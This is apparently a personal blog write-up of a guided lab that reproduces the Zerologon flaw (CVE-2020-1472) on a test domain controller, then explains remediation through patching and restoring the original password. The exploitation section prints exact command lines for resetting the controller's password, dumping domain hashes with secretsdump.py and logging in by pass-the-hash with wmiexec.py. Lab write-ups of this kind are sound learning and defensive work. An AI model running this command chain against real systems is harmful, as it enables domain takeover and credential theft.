CVE - 2020–1472 (Zerologon Vulnerability)-Exploitation & Remediation

Zerologon (CVE 2020-1472) Vulnerability

NOTE: This is my first vulnerability-related writeup and I have tried to write and explain in layman terms. There may be knowledge gaps in between, which I am trying my hardest to cover and understand

I have tried to reproduce the vulnerability in this blog entry, while trying to understand it's severity and impact

Section 1 — Exploiting Zerologon Vulnerability(CVE 2020–1472)

About the Vulnerability

Netlogon is a service that runs on the Domain Controller. This service is responsible for authenticating user logins — effectively verifying the user is who they claim to be. As this function is one of the core functions of a Domain Controller, the Netlogon service cannot be stopped or firewalled off from networks of domain-joined computers.

CVSS Score — 10
Attack Complexity — Low
Privileges Required — Low
Vulnerability Found — July 2020

Exploitable Point

The Netlogon RPC service, used for computer and user authentication in Windows, also allows a computer to update its computer password within the domain. For several historical reasons, this service does not use standard authentication protocols to authenticate the computer. The vulnerability exists within the non-standard method used to authenticate.

Twitter thread providing a nice walkthrough — https://twitter.com/_dirkjan/status/1306280553281449985

Exploitation Walkthrough

What do you need?
Impacket — to capture password hashes and dump them
Windows 10 OS (on which the vulnerable service exists)
Windows 10 VM — to perform the exploit on RangeForce’s
ZeroLogon Vulnerability Lab (Guided Mode)

First, let’s clone the impacket repository from Github

Step to install:-

git clone https://github.com/SecureAuthCorp/impacket.git

Now, let’s copy the exploit too from Github <cve-2020–1472-exploit.py>

Credits to dirkjanm.

https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py

Export the exploit to /impacket/examples/CVE-2020–1472/

Now, let’s switch to this directory

By now, we have identified the following details about the vulnerable service:-

NetBIOS computer name: DC IP address: 192.168.0.4

Syntax of exploit command:- ./cve-2020–1472-exploit.py -n <NetBIOS computer name> -t <IP address>

Now to run the script and exploit

./cve-2020–1472-exploit.py -n DC -t 192.168.0.4

What does this exploit do?

It resets the Domain Controller’s account password to an empty string(easy login with a spacebar)

The gist: Your Domain Controller account’s password is a blank string

**Next objective-**dump password hashes from the Domain Controller

Domain Controller name NetBios Name IP Address of vulnerable host

We make use of the secretsdump.py module from Impacket to perform this task

Password Dump command syntax- python3 secretsdump.py -no-pass -just dc<Domain/NETBIOS_NAME\[email protected]>

(This command does not work with the simple execution command ./)

Filling in the blanks:-

python3 secretsdump.py -no-pass -just-dc CONTOSO.AZURE/DC\$@192.168.0.4

This leads to the dumping of around 60 password hashes:-

Next objective — Logging onto the account of ContosoAdmin (Domain Controller admin’s account) — using the account’s dumped hash

Scrolling through the dumped list, we find the appropriate entry:-

Logging on to the server, using the wmiexec.py module:-

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:a2bd759faf686d052f5f7c8337a2ff51 CONTOSO.AZURE/DC\$@192.168.0.4

We are in!

Section 2 — Remediation from the Vulnerability

How?

Manually restoring your password (or)
Update and install the August 2020 & February 2021 Patch Tuesday release for the same (patches released in two phases)

Manual Password Restore — How does it work?

As you exploit the vulnerability, the password hash is being erased and replaced with a blank string in the SAM file, from where your computer cross-checks passwords as a user logs in

Using the same methodology, we copy your compromised password (blank space in this case) from the SAM hive to the Domain Controller of the exploited machine. Further, copy it to your Kali VM and then delete it from the Domain Controller

Which we achieve from the following steps:-

Now exiting the Windows machine, using exit- to the Kali machine

The next task is to parse the obtained SAM file, from the Domain Controller

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL Why parse? — To see where accounts are mapped to and to gain other information

Recovered password hash — 89ed2eb25e25770b7dd850e797ef8c7b49cc4d793ea50f9db33fe91cde5b97c20b8aa582a3acd371618e7f7ed5ad9ee87df1d073641c6718cb63ed7409711480

Now to place the final piece of the jigsaw — restoring the original password. For that, we have a customized script named — reinstall_original_pw.py

Syntax — reinstall_original_pw.py <DC_NETBIOS_NAME> <DC_IP_ADDR> <ORIG_NT_HASH>

Filling in the blanks here,

./reinstall_original_pw.py DC 192.168.0.4 89ed2eb25e25770b7dd850e797ef8c7b49cc4d793ea50f9db33fe91cde5b97c20b8aa582a3acd371618e7f7ed5ad9ee87df1d073641c6718cb63ed7409711480

Conclusion

This is an easy vulnerability to exploit, with less complexity, considering that we are still dependant on IT Systems to perform administrative tasks. This may be disputed, but 100% security may be a myth unless drastic action is taken to respond and patch even the slightest of issues

Thank you for the time taken to devour this purple team blog entry.

Your opinion matters

My audience has a voice. Feel free to reach out to me, on my socials (links are on top of this page) for any queries to be addressed. Dropping a sweet message would make my day

Let your opinion about this write-up be known, by selecting any one of the emojis below!

PreviousDevSecOps-Making a difference from traditional DevOps NextComputer Forensics Acquisition

Last updated 2 years ago